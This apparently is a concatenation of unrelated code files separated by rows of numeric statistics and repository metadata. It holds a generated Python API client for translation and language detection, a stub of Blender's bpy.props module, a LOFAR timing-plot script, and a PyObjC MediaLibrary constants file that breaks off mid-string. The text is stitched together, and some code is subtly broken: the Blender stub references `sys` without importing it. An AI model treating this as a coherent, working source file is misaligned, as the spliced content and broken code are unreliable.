        all_params = ['text', 'source_language', 'target_language', 'providers']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # Snapshot of the local namespace; kwargs are merged in after being
        # checked against the whitelist above, so unknown keywords fail fast.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method automatic_translation" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'text' is set
        if ('text' not in params or
                params['text'] is None):
            raise ValueError("Missing the required parameter `text` when calling `automatic_translation`")  # noqa: E501
        # verify the required parameter 'source_language' is set
        if ('source_language' not in params or
                params['source_language'] is None):
            raise ValueError("Missing the required parameter `source_language` when calling `automatic_translation`")  # noqa: E501
        # verify the required parameter 'target_language' is set
        if ('target_language' not in params or
                params['target_language'] is None):
            raise ValueError("Missing the required parameter `target_language` when calling `automatic_translation`")  # noqa: E501
        # verify the required parameter 'providers' is set
        if ('providers' not in params or
                params['providers'] is None):
            raise ValueError("Missing the required parameter `providers` when calling `automatic_translation`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        query_params = []
        header_params = {}
        # All four parameters are sent url-encoded in the form body.
        form_params = []
        local_var_files = {}
        if 'text' in params:
            form_params.append(('text', params['text']))  # noqa: E501
        if 'source_language' in params:
            form_params.append(('source_language', params['source_language']))  # noqa: E501
        if 'target_language' in params:
            form_params.append(('target_language', params['target_language']))  # noqa: E501
        if 'providers' in params:
            form_params.append(('providers', params['providers']))  # noqa: E501
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/x-www-form-urlencoded'])  # noqa: E501
        # Authentication setting
        auth_settings = ['Bearer']  # noqa: E501
        # ApiClient handles serialization, auth injection and, when async_req
        # is set, dispatching the request onto a worker thread.
        return self.api_client.call_api(
            '/pretrained/translation/automatic_translation', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='InlineResponse2007',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def langiage_detection(self, text, providers, **kwargs):  # noqa: E501
    """langiage_detection  # noqa: E501

    Detect which natural language the given content is written in, using
    the selected providers.  NOTE(review): the "langiage" spelling is part
    of the generated public API surface and is kept for compatibility.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.langiage_detection(text, providers, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str text: (required)
    :param str providers: (required)
    :return: InlineResponse2008
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always unwraps the response payload; callers
    # never see the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # Both the async and sync paths simply forward to the *_with_http_info
    # variant: it returns a thread when async_req is set, data otherwise.
    return self.langiage_detection_with_http_info(text, providers, **kwargs)  # noqa: E501
def langiage_detection_with_http_info(self, text, providers, **kwargs):  # noqa: E501
    """langiage_detection  # noqa: E501

    Build and send the POST request for language detection and return the
    raw ``call_api`` result.  Language Detection or language guessing is
    the algorithm of determining which natural language given content is
    in.  NOTE(review): the "langiage" spelling is part of the generated
    public API surface and is kept for compatibility.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.langiage_detection_with_http_info(text, providers, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str text: (required)
    :param str providers: (required)
    :return: InlineResponse2008
             If the method is called asynchronously,
             returns the request thread.
    """
    # Every keyword argument this endpoint accepts; anything else in
    # **kwargs is rejected below with a TypeError.
    all_params = ['text', 'providers']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # Capture the current local namespace so the positional arguments
    # ('text', 'providers') and the flattened kwargs can be validated and
    # looked up generically.  Statement order matters: this must run
    # before any further helper variables are introduced.
    params = locals()
    # Reject unknown keyword arguments, then merge the accepted ones into
    # `params` next to the positional arguments.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method langiage_detection" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'text' is set
    if ('text' not in params or
            params['text'] is None):
        raise ValueError("Missing the required parameter `text` when calling `langiage_detection`")  # noqa: E501
    # verify the required parameter 'providers' is set
    if ('providers' not in params or
            params['providers'] is None):
        raise ValueError("Missing the required parameter `providers` when calling `langiage_detection`")  # noqa: E501
    collection_formats = {}
    path_params = {}
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    # The endpoint is form-encoded, so parameters travel as form fields
    # rather than a JSON body.
    if 'text' in params:
        form_params.append(('text', params['text']))  # noqa: E501
    if 'providers' in params:
        form_params.append(('providers', params['providers']))  # noqa: E501
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/x-www-form-urlencoded'])  # noqa: E501
    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501
    return self.api_client.call_api(
        '/pretrained/translation/language_detection', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='InlineResponse2008',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
| 90.034091
| 4,375
| 0.633683
| 3,018
| 23,769
| 4.898277
| 0.195494
| 0.022188
| 0.021579
| 0.023811
| 0.784076
| 0.759859
| 0.72739
| 0.718596
| 0.716363
| 0.708787
| 0
| 0.010492
| 0.165972
| 23,769
| 263
| 4,376
| 90.376426
| 0.73522
| 0.687997
| 0
| 0.70073
| 0
| 0
| 0.228538
| 0.058306
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036496
| false
| 0
| 0.029197
| 0
| 0.116788
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
040a4aa35d3b3939429edd233d1db612a66e5b5c
| 10,232
|
py
|
Python
|
blenderlib/bpy.props.py
|
kabuku/blender-python
|
6e8eee4cd79242bb0a3cd1dd848da04bfe0a9182
|
[
"MIT"
] | 23
|
2015-04-18T02:37:19.000Z
|
2021-12-20T23:59:28.000Z
|
blenderlib/bpy.props.py
|
kabuku/blender-python
|
6e8eee4cd79242bb0a3cd1dd848da04bfe0a9182
|
[
"MIT"
] | null | null | null |
blenderlib/bpy.props.py
|
kabuku/blender-python
|
6e8eee4cd79242bb0a3cd1dd848da04bfe0a9182
|
[
"MIT"
] | 5
|
2017-05-06T07:20:40.000Z
|
2021-11-08T18:35:43.000Z
|
'''Property Definitions (bpy.props)
This module defines properties to extend Blender's internal data. The result of these functions is used to assign properties to classes registered with Blender and cannot be used directly.
'''
def BoolProperty(name="", description="", default=False, options={'ANIMATABLE'}, subtype='NONE', update=None, get=None, set=None):
    # Stub only: Blender supplies the real implementation at runtime.  The
    # mutable default for *options* mirrors Blender's published signature
    # and is harmless here because the body never runs any logic.
    '''Returns a new boolean property definition.

    Arguments:
    @name (string): Name used in the user interface.
    @description (string): Text used for the tooltip and api documentation.
    @default (boolean): Default value for this property.
    @options (set): Enumerator in ['HIDDEN', 'SKIP_SAVE', 'ANIMATABLE', 'LIBRARY_EDITABLE'].
    @subtype (string): Enumerator in ['UNSIGNED', 'PERCENTAGE', 'FACTOR', 'ANGLE', 'TIME', 'DISTANCE', 'NONE'].
    @update (function): function to be called when this value is modified. This function must take 2 values (self, context) and return None.
        *Warning* there are no safety checks to avoid infinite recursion.
    @get (function): presumably a read override taking (self) -- TODO confirm against the Blender API docs.
    @set (function): presumably a write override taking (self, value) -- TODO confirm against the Blender API docs.
    '''
    pass
def BoolVectorProperty(name="", description="", default=(False, False, False), options={'ANIMATABLE'}, subtype='NONE', size=3, update=None, get=None, set=None):
    # Stub only: Blender supplies the real implementation at runtime.  The
    # mutable default for *options* mirrors Blender's published signature.
    '''Returns a new vector boolean property definition.

    Arguments:
    @name (string): Name used in the user interface.
    @description (string): Text used for the tooltip and api documentation.
    @default (sequence): sequence of booleans the length of *size*.
    @options (set): Enumerator in ['HIDDEN', 'SKIP_SAVE', 'ANIMATABLE', 'LIBRARY_EDITABLE'].
    @subtype (string): Enumerator in ['COLOR', 'TRANSLATION', 'DIRECTION', 'VELOCITY', 'ACCELERATION', 'MATRIX', 'EULER', 'QUATERNION', 'AXISANGLE', 'XYZ', 'COLOR_GAMMA', 'LAYER', 'NONE'].
    @size (int): Vector dimensions in [1, and 32].
    @update (function): function to be called when this value is modified. This function must take 2 values (self, context) and return None.
        *Warning* there are no safety checks to avoid infinite recursion.
    @get (function): presumably a read override taking (self) -- TODO confirm against the Blender API docs.
    @set (function): presumably a write override taking (self, value) -- TODO confirm against the Blender API docs.
    '''
    pass
def CollectionProperty(items, type="", description="", options={'ANIMATABLE'}):
    # Stub only: Blender supplies the real implementation at runtime.
    # NOTE(review): the leading positional *items* parameter and the
    # documented @name argument do not match Blender's published
    # CollectionProperty signature -- confirm against the API docs before
    # relying on this stub's signature.
    '''Returns a new collection property definition.

    Arguments:
    @type (class): A subclass of bpy.types.PropertyGroup.
    @name (string): Name used in the user interface.
    @description (string): Text used for the tooltip and api documentation.
    @options (set): Enumerator in ['HIDDEN', 'SKIP_SAVE', 'ANIMATABLE', 'LIBRARY_EDITABLE'].
    '''
    pass
def EnumProperty(items, name="", description="", default="", options={'ANIMATABLE'}, update=None, get=None, set=None):
    # Stub only: Blender supplies the real implementation at runtime.  The
    # mutable default for *options* mirrors Blender's published signature.
    '''Returns a new enumerator property definition.

    Arguments:
    @name (string): Name used in the user interface.
    @description (string): Text used for the tooltip and api documentation.
    @default (string or set): The default value for this enum. A string when *ENUM_FLAG* is disabled, otherwise a set which may only contain string identifiers
        used in *items*.
    @options (set): Enumerator in ['HIDDEN', 'SKIP_SAVE', 'ANIMATABLE', 'ENUM_FLAG', 'LIBRARY_EDITABLE'].
    @items (sequence of string triples or a function): sequence of enum items formatted: [(identifier, name, description, icon, number), ...] where the identifier is used
        for python access and other values are used for the interface.
        Note the item is optional.
        For dynamic values a callback can be passed which returns a list in
        the same format as the static list.
        This function must take 2 arguments (self, context).
        WARNING: Do not use generators here (they will work the first time, but will lead to empty values
        in some unload/reload scenarii)!
    @update (function): function to be called when this value is modified. This function must take 2 values (self, context) and return None.
        *Warning* there are no safety checks to avoid infinite recursion.
    @get (function): presumably a read override taking (self) -- TODO confirm against the Blender API docs.
    @set (function): presumably a write override taking (self, value) -- TODO confirm against the Blender API docs.
    '''
    pass
def FloatProperty(name="", description="", default=0.0, min=-sys.float_info.max, max=sys.float_info.max, soft_min=-sys.float_info.max, soft_max=sys.float_info.max, step=3, precision=2, options={'ANIMATABLE'}, subtype='NONE', unit='NONE', update=None, get=None, set=None):
    # Stub only: Blender supplies the real implementation at runtime.
    # Fix: the lower bounds previously defaulted to ``sys.float_info.min``,
    # which is the smallest *positive* normal float (~2.2e-308), not a
    # lower limit.  Blender documents the defaults as -3.402823e+38, i.e.
    # ``-sys.float_info.max``.  The body is ``pass``, so this only corrects
    # the advertised signature.
    '''Returns a new float property definition.

    Arguments:
    @name (string): Name used in the user interface.
    @description (string): Text used for the tooltip and api documentation.
    @default (float): Default value for this property.
    @min (float): Hard minimum of the property value.
    @max (float): Hard maximum of the property value.
    @soft_min (float): Soft minimum used by the UI slider.
    @soft_max (float): Soft maximum used by the UI slider.
    @step (int): Step of increment/decrement in the UI.
    @precision (int): Number of decimal digits to display in the UI.
    @options (set): Enumerator in ['HIDDEN', 'SKIP_SAVE', 'ANIMATABLE', 'LIBRARY_EDITABLE'].
    @subtype (string): Enumerator in ['UNSIGNED', 'PERCENTAGE', 'FACTOR', 'ANGLE', 'TIME', 'DISTANCE', 'NONE'].
    @unit (string): Enumerator in ['NONE', 'LENGTH', 'AREA', 'VOLUME', 'ROTATION', 'TIME', 'VELOCITY', 'ACCELERATION'].
    @update (function): function to be called when this value is modified. This function must take 2 values (self, context) and return None.
        *Warning* there are no safety checks to avoid infinite recursion.
    @get (function): presumably a read override taking (self) -- TODO confirm against the Blender API docs.
    @set (function): presumably a write override taking (self, value) -- TODO confirm against the Blender API docs.
    '''
    pass
def FloatVectorProperty(name="", description="", default=(0.0, 0.0, 0.0), min=-sys.float_info.max, max=sys.float_info.max, soft_min=-sys.float_info.max, soft_max=sys.float_info.max, step=3, precision=2, options={'ANIMATABLE'}, subtype='NONE', size=3, update=None, get=None, set=None):
    # Stub only: Blender supplies the real implementation at runtime.
    # Fix: the lower bounds previously defaulted to ``sys.float_info.min``,
    # which is the smallest *positive* normal float (~2.2e-308), not a
    # lower limit.  Blender documents the defaults as -3.402823e+38, i.e.
    # ``-sys.float_info.max``.
    # NOTE(review): the docstring mentions @unit but the signature has no
    # *unit* parameter -- confirm against the Blender API docs.
    '''Returns a new vector float property definition.

    Arguments:
    @name (string): Name used in the user interface.
    @description (string): Text used for the tooltip and api documentation.
    @default (sequence): sequence of floats the length of *size*.
    @min (float): Hard minimum of each component.
    @max (float): Hard maximum of each component.
    @soft_min (float): Soft minimum used by the UI slider.
    @soft_max (float): Soft maximum used by the UI slider.
    @step (int): Step of increment/decrement in the UI.
    @precision (int): Number of decimal digits to display in the UI.
    @options (set): Enumerator in ['HIDDEN', 'SKIP_SAVE', 'ANIMATABLE', 'LIBRARY_EDITABLE'].
    @subtype (string): Enumerator in ['COLOR', 'TRANSLATION', 'DIRECTION', 'VELOCITY', 'ACCELERATION', 'MATRIX', 'EULER', 'QUATERNION', 'AXISANGLE', 'XYZ', 'COLOR_GAMMA', 'LAYER', 'NONE'].
    @unit (string): Enumerator in ['NONE', 'LENGTH', 'AREA', 'VOLUME', 'ROTATION', 'TIME', 'VELOCITY', 'ACCELERATION'].
    @size (int): Vector dimensions in [1, and 32].
    @update (function): function to be called when this value is modified. This function must take 2 values (self, context) and return None.
        *Warning* there are no safety checks to avoid infinite recursion.
    '''
    pass
def IntProperty(name="", description="", default=0, min=-sys.maxsize, max=sys.maxsize, soft_min=-sys.maxsize, soft_max=sys.maxsize, step=1, options={'ANIMATABLE'}, subtype='NONE', update=None, get=None, set=None):
    # Stub only: Blender supplies the real implementation at runtime.
    # Fix: ``sys.maxint`` was removed in Python 3, so evaluating the old
    # defaults raised NameError when this stub module was imported.
    # ``sys.maxsize`` exists on both Python 2 and 3.
    '''Returns a new int property definition.

    Arguments:
    @name (string): Name used in the user interface.
    @description (string): Text used for the tooltip and api documentation.
    @default (int): Default value for this property.
    @min (int): Hard minimum of the property value.
    @max (int): Hard maximum of the property value.
    @soft_min (int): Soft minimum used by the UI slider.
    @soft_max (int): Soft maximum used by the UI slider.
    @step (int): Step of increment/decrement in the UI.
    @options (set): Enumerator in ['HIDDEN', 'SKIP_SAVE', 'ANIMATABLE', 'LIBRARY_EDITABLE'].
    @subtype (string): Enumerator in ['UNSIGNED', 'PERCENTAGE', 'FACTOR', 'ANGLE', 'TIME', 'DISTANCE', 'NONE'].
    @update (function): function to be called when this value is modified. This function must take 2 values (self, context) and return None.
        *Warning* there are no safety checks to avoid infinite recursion.
    @get (function): presumably a read override taking (self) -- TODO confirm against the Blender API docs.
    @set (function): presumably a write override taking (self, value) -- TODO confirm against the Blender API docs.
    '''
    pass
def IntVectorProperty(name="", description="", default=(0, 0, 0), min=-sys.maxsize, max=sys.maxsize, soft_min=-sys.maxsize, soft_max=sys.maxsize, options={'ANIMATABLE'}, subtype='NONE', size=3, update=None, get=None, set=None):
    # Stub only: Blender supplies the real implementation at runtime.
    # Fix: ``sys.maxint`` was removed in Python 3, so evaluating the old
    # defaults raised NameError when this stub module was imported.
    # ``sys.maxsize`` exists on both Python 2 and 3.
    '''Returns a new vector int property definition.

    Arguments:
    @name (string): Name used in the user interface.
    @description (string): Text used for the tooltip and api documentation.
    @default (sequence): sequence of ints the length of *size*.
    @min (int): Hard minimum of each component.
    @max (int): Hard maximum of each component.
    @soft_min (int): Soft minimum used by the UI slider.
    @soft_max (int): Soft maximum used by the UI slider.
    @options (set): Enumerator in ['HIDDEN', 'SKIP_SAVE', 'ANIMATABLE', 'LIBRARY_EDITABLE'].
    @subtype (string): Enumerator in ['COLOR', 'TRANSLATION', 'DIRECTION', 'VELOCITY', 'ACCELERATION', 'MATRIX', 'EULER', 'QUATERNION', 'AXISANGLE', 'XYZ', 'COLOR_GAMMA', 'LAYER', 'NONE'].
    @size (int): Vector dimensions in [1, and 32].
    @update (function): function to be called when this value is modified. This function must take 2 values (self, context) and return None.
        *Warning* there are no safety checks to avoid infinite recursion.
    '''
    pass
def PointerProperty(type="", description="", options={'ANIMATABLE'}, update=None):
    # Stub only: Blender supplies the real implementation at runtime.
    # NOTE(review): the docstring documents @name but the signature has no
    # *name* parameter -- confirm against the Blender API docs.
    '''Returns a new pointer property definition.

    Arguments:
    @type (class): A subclass of bpy.types.PropertyGroup.
    @name (string): Name used in the user interface.
    @description (string): Text used for the tooltip and api documentation.
    @options (set): Enumerator in ['HIDDEN', 'SKIP_SAVE', 'ANIMATABLE', 'LIBRARY_EDITABLE'].
    @update (function): function to be called when this value is modified. This function must take 2 values (self, context) and return None.
        *Warning* there are no safety checks to avoid infinite recursion.
    '''
    pass
def RemoveProperty(cls, attr):
    # Stub only: Blender supplies the real implementation at runtime.
    '''Removes a dynamically defined property.

    Arguments:
    @cls (type): The class containing the property (must be a positional argument).
    @attr (string): Property name (must be passed as a keyword).

    Note: Typically this function doesn't need to be accessed directly. Instead use del cls.attr
    '''
    pass
def StringProperty(name="", description="", default="", maxlen=0, options={'ANIMATABLE'}, subtype='NONE', update=None, get=None, set=None):
    # Stub only: Blender supplies the real implementation at runtime.
    '''Returns a new string property definition.

    Arguments:
    @name (string): Name used in the user interface.
    @description (string): Text used for the tooltip and api documentation.
    @default (string): Default value for this property.
    @maxlen (int): Maximum length of the string; 0 presumably means unlimited -- TODO confirm against the Blender API docs.
    @options (set): Enumerator in ['HIDDEN', 'SKIP_SAVE', 'ANIMATABLE', 'LIBRARY_EDITABLE'].
    @subtype (string): Enumerator in ['FILE_PATH', 'DIR_PATH', 'FILE_NAME', 'NONE'].
    @update (function): function to be called when this value is modified. This function must take 2 values (self, context) and return None.
        *Warning* there are no safety checks to avoid infinite recursion.
    @get (function): presumably a read override taking (self) -- TODO confirm against the Blender API docs.
    @set (function): presumably a write override taking (self, value) -- TODO confirm against the Blender API docs.
    '''
    pass
| 52.204082
| 283
| 0.666243
| 1,286
| 10,232
| 5.266719
| 0.16563
| 0.033663
| 0.016241
| 0.026576
| 0.781781
| 0.773808
| 0.766573
| 0.766573
| 0.759781
| 0.754614
| 0
| 0.004951
| 0.210321
| 10,232
| 195
| 284
| 52.471795
| 0.833292
| 0.717651
| 0
| 0.5
| 0
| 0
| 0.069915
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0.5
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
044e6d4fc9ca5f81b49f92138b1e644da6b0cdeb
| 1,965
|
py
|
Python
|
LIM_scripts/stationTimings/examples/plot_pulse.py
|
Bhare8972/LOFAR-LIM
|
89f25be8c02cb8980c2e237da3eaac279d40a06a
|
[
"MIT"
] | 3
|
2019-04-21T13:13:02.000Z
|
2020-10-15T12:44:23.000Z
|
LIM_scripts/stationTimings/examples/plot_pulse.py
|
Bhare8972/LOFAR-LIM
|
89f25be8c02cb8980c2e237da3eaac279d40a06a
|
[
"MIT"
] | null | null | null |
LIM_scripts/stationTimings/examples/plot_pulse.py
|
Bhare8972/LOFAR-LIM
|
89f25be8c02cb8980c2e237da3eaac279d40a06a
|
[
"MIT"
] | 2
|
2018-11-06T18:34:33.000Z
|
2019-04-04T14:16:57.000Z
|
#!/usr/bin/env python3
from run_Fitter4 import *
from LoLIM.stationTimings.timingInspector_4 import plot_all_stations, plot_station
#plot_all_stations(40,
#
# timeID = "D20180809T141413.250Z",
# output_folder = "Callibration_1",
# pulse_input_folders = ['pulse_finding'],
# guess_timings = guess_timings,
# sources_to_fit = known_sources, ## NOTE: that the index here is file_index + source_index*10
# guess_source_locations = guess_source_locations,
# source_polarizations = known_polarizations, ## NOTE: 0 is even, 1 is odd, 2 is both
# source_stations_to_exclude = stations_to_exclude,
# source_antennas_to_exclude = antennas_to_exclude,
# bad_ants = bad_antennas,
# antennas_to_recalibrate = antennas_to_recallibrate,
# min_ant_amplitude = 10,
# ref_station = "CS002")
# Inspect pulse 110 as recorded by station CS002 (interactive mode on).
# All scenario constants (guess_timings, known_sources, ...) come from
# run_Fitter4 via the star import above.
station_settings = dict(
    timeID="D20180809T141413.250Z",
    output_folder="Callibration_1",
    pulse_input_folders=['pulse_finding'],
    guess_timings=guess_timings,
    sources_to_fit=known_sources,  ## NOTE: that the index here is file_index + source_index*10
    guess_source_locations=guess_source_locations,
    source_polarizations=known_polarizations,  ## NOTE: 0 is even, 1 is odd, 2 is both
    source_stations_to_exclude=stations_to_exclude,
    source_antennas_to_exclude=antennas_to_exclude,
    bad_ants=bad_antennas,
    antennas_to_recalibrate=antennas_to_recallibrate,
    min_ant_amplitude=10,
    ref_station="CS002",
)
plot_station(110, 'CS002', True, **station_settings)
| 50.384615
| 118
| 0.570483
| 194
| 1,965
| 5.35567
| 0.324742
| 0.069297
| 0.076997
| 0.061598
| 0.858518
| 0.858518
| 0.858518
| 0.858518
| 0.858518
| 0.858518
| 0
| 0.053729
| 0.365394
| 1,965
| 38
| 119
| 51.710526
| 0.779471
| 0.50229
| 0
| 0
| 0
| 0
| 0.060797
| 0.022013
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.111111
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0b03b42790270534ef8b3be7c9668a4a3293b394
| 5,738
|
py
|
Python
|
env/lib/python3.10/site-packages/MediaLibrary/_metadata.py
|
Arcfrost/MyBlog---TextToSpeech
|
861db3881fde00397a9b826c900fa96f5c5d9ae4
|
[
"MIT"
] | null | null | null |
env/lib/python3.10/site-packages/MediaLibrary/_metadata.py
|
Arcfrost/MyBlog---TextToSpeech
|
861db3881fde00397a9b826c900fa96f5c5d9ae4
|
[
"MIT"
] | null | null | null |
env/lib/python3.10/site-packages/MediaLibrary/_metadata.py
|
Arcfrost/MyBlog---TextToSpeech
|
861db3881fde00397a9b826c900fa96f5c5d9ae4
|
[
"MIT"
] | null | null | null |
# This file is generated by objective.metadata
#
# Last update: Sun Jul 11 21:41:10 2021
#
# flake8: noqa
import objc, sys
if sys.maxsize <= 2 ** 32:
    # 32-bit interpreter: metadata selectors resolve to the first value.
    def sel32or64(a, b):
        '''Return *a*, the 32-bit variant of a (32-bit, 64-bit) pair.'''
        return a
else:
    # 64-bit interpreter: metadata selectors resolve to the second value.
    def sel32or64(a, b):
        '''Return *b*, the 64-bit variant of a (32-bit, 64-bit) pair.'''
        return b
if objc.arch == "arm64":
def selAorI(a, b):
return a
else:
def selAorI(a, b):
return b
misc = {}
constants = """$MLApertureAllPhotosTypeIdentifier$MLApertureAllProjectsTypeIdentifier$MLApertureFacebookAlbumTypeIdentifier$MLApertureFacebookGroupTypeIdentifier$MLApertureFacesAlbumTypeIdentifier$MLApertureFlaggedTypeIdentifier$MLApertureFlickrAlbumTypeIdentifier$MLApertureFlickrGroupTypeIdentifier$MLApertureFolderAlbumTypeIdentifier$MLApertureLastImportAlbumTypeIdentifier$MLApertureLastNMonthsAlbumTypeIdentifier$MLApertureLastViewedEventAlbumTypeIdentifier$MLApertureLightTableTypeIdentifier$MLAperturePhotoStreamAlbumTypeIdentifier$MLAperturePlacesAlbumTypeIdentifier$MLAperturePlacesCityAlbumTypeIdentifier$MLAperturePlacesCountryAlbumTypeIdentifier$MLAperturePlacesPointOfInterestAlbumTypeIdentifier$MLAperturePlacesProvinceAlbumTypeIdentifier$MLApertureProjectAlbumTypeIdentifier$MLApertureProjectFolderAlbumTypeIdentifier$MLApertureRootGroupTypeIdentifier$MLApertureSlideShowTypeIdentifier$MLApertureSmugMugAlbumTypeIdentifier$MLApertureSmugMugGroupTypeIdentifier$MLApertureUserAlbumTypeIdentifier$MLApertureUserSmartAlbumTypeIdentifier$MLFinalCutEventCalendarGroupTypeIdentifier$MLFinalCutEventGroupTypeIdentifier$MLFinalCutEventLibraryGroupTypeIdentifier$MLFinalCutFolderGroupTypeIdentifier$MLFinalCutProjectGroupTypeIdentifier$MLFinalCutRootGroupTypeIdentifier$MLFolderGroupTypeIdentifier$MLFolderRootGroupTypeIdentifier$MLGarageBandFolderGroupTypeIdentifier$MLGarageBandRootGroupTypeIdentifier$MLLogicBouncesGroupTypeIdentifier$MLLogicProjectTypeIdentifier$MLLogicProjectsGroupTypeIdentifier$MLLogicRootGroupTypeIdentifier$MLMediaLoadAppFoldersKey$MLMediaLoadAppleLoops$MLMediaLoadExcludeSourcesKey$MLMediaLoadFoldersKey$MLMediaLoadIncludeSourcesKey$MLMediaLoadMoviesFolder$MLMediaLoadSourceTypesKey$MLMediaObjectAlbumKey$MLMediaObjectArtistKey$MLMediaObjectBitRateKey$MLMediaObjectChannelCountKey$MLMediaObjectCommentsKey$MLMediaObjectDurationKey$MLMediaObjectGenreKey$MLMediaObjectKeywordsKey$MLMediaObjectKindKey$MLMediaObjectProtectedKey$MLMediaObjectResolutionStringKey$MLMediaObj
ectSampleRateKey$MLMediaObjectTrackNumberKey$MLMediaSourceApertureIdentifier$MLMediaSourceAppDefinedFoldersIdentifier$MLMediaSourceCustomFoldersIdentifier$MLMediaSourceFinalCutIdentifier$MLMediaSourceGarageBandIdentifier$MLMediaSourceLogicIdentifier$MLMediaSourceMoviesFolderIdentifier$MLMediaSourcePhotoBoothIdentifier$MLMediaSourcePhotosIdentifier$MLMediaSourceiMovieIdentifier$MLMediaSourceiPhotoIdentifier$MLMediaSourceiTunesIdentifier$MLPhotosAlbumTypeIdentifier$MLPhotosAlbumsGroupTypeIdentifier$MLPhotosAllCollectionsGroupTypeIdentifier$MLPhotosAllMomentsGroupTypeIdentifier$MLPhotosAllPhotosAlbumTypeIdentifier$MLPhotosAllYearsGroupTypeIdentifier$MLPhotosAnimatedGroupTypeIdentifier$MLPhotosBurstGroupTypeIdentifier$MLPhotosCollectionGroupTypeIdentifier$MLPhotosDepthEffectGroupTypeIdentifier$MLPhotosFacesAlbumTypeIdentifier$MLPhotosFavoritesGroupTypeIdentifier$MLPhotosFolderTypeIdentifier$MLPhotosFrontCameraGroupTypeIdentifier$MLPhotosLastImportGroupTypeIdentifier$MLPhotosLivePhotosGroupTypeIdentifier$MLPhotosLongExposureGroupTypeIdentifier$MLPhotosMomentGroupTypeIdentifier$MLPhotosMyPhotoStreamTypeIdentifier$MLPhotosPanoramasGroupTypeIdentifier$MLPhotosPublishedAlbumTypeIdentifier$MLPhotosRootGroupTypeIdentifier$MLPhotosScreenshotGroupTypeIdentifier$MLPhotosSharedGroupTypeIdentifier$MLPhotosSharedPhotoStreamTypeIdentifier$MLPhotosSloMoGroupTypeIdentifier$MLPhotosSmartAlbumTypeIdentifier$MLPhotosTimelapseGroupTypeIdentifier$MLPhotosVideosGroupTypeIdentifier$MLPhotosYearGroupTypeIdentifier$MLiMovieEventCalendarGroupTypeIdentifier$MLiMovieEventGroupTypeIdentifier$MLiMovieEventLibraryGroupTypeIdentifier$MLiMovieFolderGroupTypeIdentifier$MLiMovieProjectGroupTypeIdentifier$MLiMovieRootGroupTypeIdentifier$MLiPhotoAlbumTypeIdentifier$MLiPhotoEventAlbumTypeIdentifier$MLiPhotoEventsFolderTypeIdentifier$MLiPhotoFacebookAlbumTypeIdentifier$MLiPhotoFacebookGroupTypeIdentifier$MLiPhotoFacesAlbumTypeIdentifier$MLiPhotoFlaggedAlbumTypeIdentifier$MLiPhotoFlickrAlbumTypeIdentifier$MLi
